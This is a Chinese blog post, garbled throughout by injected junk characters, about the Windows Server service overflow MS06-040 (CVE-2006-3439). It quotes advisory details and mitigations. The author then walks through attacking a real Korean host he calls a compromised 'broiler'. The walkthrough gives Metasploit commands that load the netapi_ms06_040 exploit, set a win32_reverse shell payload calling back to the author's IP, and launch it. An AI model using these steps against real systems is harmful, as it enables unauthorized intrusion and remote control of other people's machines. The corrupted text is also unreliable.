MS06040漏洞的利用
爱好者博墅lN&[H-F!w(Z)EU}5A爱好者博墅H
l%IF+E
El4FMicrosoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)
P1cizo}+I;^0 8GZ9Cjdz&O;z"o0发布Do not irrigate.Otherwise deletes ID...期:2006-08-08
爱好者博墅E7K9}u8T K8c_eU更新Do not irrigate.Otherwise deletes ID...期:2006-08-09
爱好者博墅gF^u4[q:r3[r~ /}2cnU"\~"zC*v!_0受影响系统:
(E5BW*d,uQ'B0Microsoft Windows XP SP2
爱好者博墅&z9t+b!gr3a(bcMicrosoft Windows XP SP1
3F,Y$]m
J+f{WJ0Microsoft Windows Server 2003 SP1
m9Mh_9t0Microsoft Windows Server 2003
d2p(j"B8?0E]1n[0Microsoft Windows 2000SP4
RxN$Q.m/h(q] j-v*T0BUGTRAQ ID: 19409
爱好者博墅%i Ww+oIaH bFrCVE(CAN) ID: CVE-2006-3439
爱好者博墅VZ}?W#kf@:X m7UVV
5LGEvY/Bd0Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。
爱好者博墅/g/R4@5np~1P+U?Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意代码.
爱好者博墅0QJ3\UQ G"Q
y/}f0临时解决方法
爱好者博墅-h7E2g2Ax2H爱好者博墅R!e_,oc~如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
^2~
u9e
Y
u_0 爱好者博墅I@;isJyu* 在防火墙阻断TCP 139和445端口。
爱好者博墅m!@yzl:B* 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
yO_ZZ6?3r0* 在支持的系统上启用高级TCP/IP过滤功能。
爱好者博墅#svi3p
o
c* 在受影响的系统上使用IPSec阻断受影响的端口。
k:@EsC$m0U4tJ&b"Hx Q0废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验.
爱好者博墅
B7S6^hAC aNQKs,xnQ0目标: 211.234.*.104
5w
{
h+@F:l+Y0 'x'mjkG0工具: Metasploit V2.6
爱好者博墅#JZ#^0J?|#]Download:
爱好者博墅gPf0sWC J9Q hhttp://www.metasploit.com/tools/framework-2.6.exe爱好者博墅
r2j
kVH+g(k{ActivePerl-5.8.7.815-MSWin32-x86-211909.msi
爱好者博墅1FC h%o5mgH%pFb(Perl解释器,必须安装)
爱好者博墅fs,QRU-_3Vyl#n 爱好者博墅:h(Vu6B8s)`下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).
+h'J,i4U3L4M/]S\0 :W,q
Ked0?&Zrt e.~0这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).
爱好者博墅$|VY'S*@4wlS,t $zO1k;GZ9T0运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1
Wc5Z h&fM0
爱好者博墅"hk3w g!L
s9q-E1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.
j fmX|u0\3M1s02.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序
(j^}Rt`O0
/dL!EL1r~/N03.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse
爱好者博墅._&w8`o;c这个Shellcode
q|u.HEg_}a#o0 ZZ(U ed V04.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为
爱好者博墅 bK9n5DwA{win32_reverse
爱好者博墅$CJ R2s4JhM"? v0a5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP
:`%{7Fz7L)wz^0U;fO1D[0hfj06.输入命令 set LHOST 125.71.2.104 //设置本机的IPD
爱好者博墅}o
m
aU
b$|7I#n5Wt}CYD:N07.输入命令 set TARGET 0 //设置溢出类型 一般选0
爱好者博墅6z*u#E.N6F)V)j?8.输入命令 set //检查输入的信息
爱好者博墅"K p;JIlM'}}6A,c
Q.X'L
爱好者博墅]3d#[yc#_'oI9.输入命令 exploit //开始溢出~
爱好者博墅7UR }
m"Zdk-G爱好者博墅nd4F$P9nj,RB
7y,s+XmWUG0这样就溢出成功了.